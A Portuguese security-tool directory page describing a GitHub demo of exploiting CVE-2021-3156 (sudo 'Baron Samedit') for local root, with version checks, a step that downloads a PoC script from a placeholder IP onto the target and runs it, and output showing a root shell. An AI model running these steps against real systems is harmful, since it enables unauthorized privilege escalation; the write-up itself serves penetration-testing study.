Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Review.CVE-2021-3156 — CVE-2021-3156-Exploit-Demo | Kitploit
Ferramentas/GitHubGitHub/topskiypavelqwertygang/review.cve-2021-3156
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed TeamingExploração de Binários
GitHubtopskiypavelqwertygang/review.cve-2021-3156

Review.CVE-2021-3156

CVE-2021-3156-Exploit-Demo

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

👑 CVE-2021-3156 (Baron Samedit) — Escalação de Privilégios via Heap Overflow no sudo

📅 Data: 2025-06-08
✍️ Autor: @TopskiyPavelQwertyGang 🧠 Pesquisador de Segurança | Entusiasta de Red Team


🧠 Visão Geral do CVE

  • ID do CVE: CVE-2021-3156
  • Tipo: Heap-based Buffer Overflow
  • Componente: sudoedit (sudo)
  • Nível de Acesso: Local
  • Objetivo: Obter privilégios de root

🧠 Descrição

Um heap-overflow no sudoedit permite que um usuário local obtenha acesso root ao executar o comando sudoedit com parâmetros pré‑preparados.

A exploração é ativa para versões do sudo < 1.9.5p2, incluindo imagens populares do Ubuntu/Debian/CentOS.
Mesmo com o ASLR ativado, a vulnerabilidade permanece explorável.


🐾 Condições de Exploração

root@kitploit:~
OS     : Ubuntu 20.04.3 LTS
glibc  : 2.31 (tcache ON)
sudo   : 1.8.31 (уязвим)
ASLR   : 2 (включён)

🧪 Preparação do Ambiente

  1. Verificadas as versões do glibc e sudo:
root@kitploit:~
ldd --version
sudo --version
  1. Transferidos os scripts PoC de outra máquina via servidor HTTP embutido:
root@kitploit:~
python3 -m http.server 80
  1. Na máquina alvo, os PoCs são baixados e executados:
root@kitploit:~
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py

🚀 Exploração Bem‑sucedida do PoC

root@kitploit:~
$ python3 exploit_nss.py
# whoami
root

🧾 Conclusão

A exploração do CVE-2021-3156 continua possível mesmo com o ASLR ativo, se o glibc ≥ 2.26 e o sudo estiverem em uma versão vulnerável.
O exploit mais estável foi o exploit_nss.py, que funciona na primeira tentativa com uma configuração correta do NSS.

🧨 Sistema sob controle.


Baixar ferramenta